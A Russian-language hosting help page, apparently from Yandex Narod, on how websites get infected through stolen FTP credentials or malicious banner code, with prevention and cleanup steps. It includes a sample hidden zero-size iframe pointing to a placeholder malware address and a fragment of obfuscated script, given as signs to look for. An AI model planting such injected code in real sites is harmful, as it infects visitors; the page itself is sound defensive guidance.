Как вирус мог попасть на мой сайт?
Существует множество способов, при помощи которых злоумышленники могут получить доступ к вашему сайту и изменить его содержание (удалить файлы, разместить на нем вирус и т.п.). Многие из тех, кто столкнулся с этим, полагают, что проблема на стороне хостинга. На самом деле самый распространенный способ получения доступа к вашему сайту — кража персональных данных (логина и пароля) владельца сайта при помощи вредоносного ПО.
Вирус, попавший на компьютер, с которого происходит управление сайтом, получает доступ к FTP-соединению, соединяется с сервером, где расположен сайт, и скрытно изменяет содержание его страниц, добавляя вредоносный код. Этот код может перехватывать личные данные пользователей, зашедших на сайт, или попытаться незаметно загрузить копию вируса на компьютер посетителя — тем самым заражая все большее и большее число компьютеров. Подробнее об этом и о том, как защититься от вредоносного ПО, читайте в разделе «общие вопросы».
Будьте внимательны к различным кодам, которые вы сами размещаете у себя на сайте. Часто пользователям под видом баннера (для "обмена ссылками" и т.п.), предлагается установить код, который, помимо самого баннера, содержит еще и вредоносный скрипт.
Меры безопасности.
Чтобы защитить ваш сайт и личные данные, следуйте следующим рекомендациям:
- Используйте антивирусы и фаерволы на компьютерах, с которых вы редактируете и обновляете сайт.
- Используйте последние версии браузеров
- Своевременно устанавливайте обновления баз антивирусов и обновления для используемой операционной системы и браузера.
- Не сохраняйте пароль от логина, под которым создан сайт, в FTP-клиентах.
- Храните копию всех страниц и файлов с сайта на компьютере.
- Внимательно относитесь к чужому коду, который вы устанавливаете на свой сайт (например, баннерные системы, счетчики и т.д.).
Что делать, если заражение произошло?
Рекомендуем сделать следующее:
- Проверьте антивирусом все компьютеры, с которых осуществляется редактирование сайта.
- Установите новый пароль и контрольный вопрос, который вы выбирали при регистрации на Яндексе.
- Проверьте, нет ли чужих телефонов на странице phone-passport.yandex.ru/phones и адресов на странице validator.yandex.ru
Проверить содержание всех страниц на сайте. Для этого HTML-редакторе просмотрите содержание каждой страницы сайта и уберите все неизвестные вам коды. В первую очередь обратите внимание на теги <iframe>, <object>, <embed>, различные java-скрипты, содержащие функции unescape() или fromCharCode(), а также теги <script>, внутри которых заключены ссылки на неизвестные вам ресурсы или их содержимое "запутано", закодировано. Например:
<iframe src="http://www.адрес-сайта-с-вирусом"
width="0" height="0" style="hidden" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></iframe>
<script
type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d')
Как правило, такие теги вставляются сразу после тега <body> или в конце страницы, и имеют нулевые параметры величины: width="0" height="0" style="hidden" frameborder="0" marginheight="0" marginwidth="0" scrolling="no".
Проверьте все каталоги сайта и убедитесь, что в них нет новых (неизвестных вам) HTML-страниц (и PHP-кода, несмотря на то, что PHP на Народе не поддерживается) и исполняемых файлов (COM, EXE и т.п.).
Также можно зарегистрировать сайт на нашем сервисе для вебмастеров. В нем имеются инструменты проверки страниц, которые в случае необходимости помогут вам выявить заражение. Если в дальнейшем вы заметите, что даты последнего обновления страниц сайта не соответствуют дням, в которые вы их обновляли, это означает, что вирус все еще действует и продолжает изменять контент вашего сайта.
Главная 
Главная страница 
..::Гороскоп::.. 
Каталог статей 
Блог блогера
Старенький Форум 
Фотоальбом 
Онлайн игры
ВИДЕО онлайн 
